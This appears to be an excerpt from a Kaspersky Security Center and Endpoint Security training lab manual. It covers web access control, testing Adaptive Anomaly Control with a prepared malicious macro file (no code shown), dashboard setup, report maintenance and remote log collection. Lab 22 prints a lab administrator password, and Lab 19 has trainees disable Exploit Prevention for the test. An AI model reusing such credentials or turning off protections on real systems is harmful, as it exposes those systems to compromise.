KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
In this task, we will configure the policy to block access to cryptocurrency exchange websites for all users during business
hours.
1. Open Kaspersky
Security Center Web
Console
2. Go to Devices | Policies
& Profiles
3. Open the policy
Kaspersky Endpoint
Security for Windows
(11.1.0)
4. Switch to the
Application Settings
tab
5. Open the Security
Controls section
6. Select the Web Control
component
7. Click Add
L–117
Lab 18.
How to configure web access control
In this task, we will make sure that the rule is applied, and the Cryptocurrencies and mining category is blocked.
Conclusion
In this lab, we studied the functionality that blocks access to websites. Access can be allowed or blocked by content category,
data type, or both. Access can be blocked during a specified time period only and be applied to user groups or specific users. A
typical use example for this functionality is blocking access to social networks, executable files, or external email, through
which information may leak, and/or infected objects can be downloaded.
L–121
Lab 19.
How to configure Adaptive Anomaly Control
Lab 19.
How to configure Adaptive Anomaly Control
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. A new component has appeared in the product that permits monitoring scripts and macros and detecting system
anomalies. You have decided to test health of this protection component. For this purpose, you will use an *.xlsx file with a
macro that contains an obfuscated PowerShell script prepared beforehand.
By default, the Adaptive Anomaly Control protection component works in the statistics mode at first and collects data about
started programs and scripts. To test how the component detects malicious files, switch it to the block mode manually.
1. Open Kaspersky
Security Center Web
Console
2. Go to Devices | Policies
& Profiles
3. Open the policy
Kaspersky Endpoint
Security for Windows
(11.1.0)
4. Switch to the
Application settings
tab
5. Disable Exploit
Prevention
L–122 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
6. Select Security
Controls
7. Open the settings of the
Adaptive Anomaly
Control component
Task B: Make sure that Adaptive Anomaly Control blocks a malicious macro
Send a message with an attachment that contains a malicious script and make sure that the file will be blocked.
Switch to Tom-Laptop
In the Kaspersky Endpoint Security policy, enable the Exploit Prevention and Behavior Detection components, and change the
Adaptive Anomaly Control rules’ operation mode.
Switch to Tom-Laptop
Conclusion
You have checked health of multitier protection against malicious macros and scripts embedded in office documents.
You can use each component individually or combine them as necessary to protect workstations.
Lab 20.
How to configure the dashboard
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. In your daily routine, you open the KSC management console to monitor the status of applications. To have a quick
protection status overview, configure the dashboard to summarize the health of your systems.
Contents. In this lab, you will configure the dashboard for daily monitoring.
L–130 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
9. Expand Statistics of
threats and select
History of network
attacks
10. Click Add
Conclusion
You have added the widgets that you need to the dashboard, which shows the most important information about network
protection.
L–134 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1
Lab 21.
How to configure maintenance tools
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. To be able to find the necessary information and react to threats quicker, delete the reports that you do not use, prepare
a virus scan task that can be started from computers’ shortcut menus, and configure weekly reports to be emailed to you.
1. Open Kaspersky
Security Center Web
Console
2. Switch to the
Monitoring &
Reporting | Reports
tab
3. Select the Errors
report
4. Click Delete
Rename the Report on most heavily infected devices to Monthly report on most heavily infected devices.
Create another report about infected computers, but schedule the report to be generated on a weekly basis.
Conclusion
You have deleted unused reports, and now you will be able to find the necessary ones quicker.
Lab 22.
How to collect diagnostic information
Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security
Center. Kaspersky Endpoint Security components will not start on a corporate computer, and you’ve failed to figure out the
reasons of the incident. Collect trace logs of Kaspersky Endpoint Security to be sent to the technical support. Do it remotely
from the Administration Console.
Contents. In this lab, you will remotely collect trace logs from a computer.
Find the Alex-Desktop computer in the console and start the remote diagnostics utility from its shortcut menu. In the utility
window, enable tracing for Kaspersky Endpoint Security, restart Kaspersky Endpoint Security, and download the logs.
Additionally, download information about the computer and Windows logs: Kaspersky Event Log and System.
1. Log on to the
abc\Administrator
account, password
Ka5per5Ky
2. Start the Administration
Console
3. Go to the Managed
devices node
4. To find the Alex-
Desktop computer, run
the search utility from
the shortcut menu of the
Managed devices node
Conclusion
We have downloaded Kaspersky Endpoint Security trace logs and system information from the computer. Attach these logs to
the request to technical support.
You can also use the diagnostics utility if you need Network Agent logs, or logs of the update module, or installation logs, or
tracing for the Administration Server.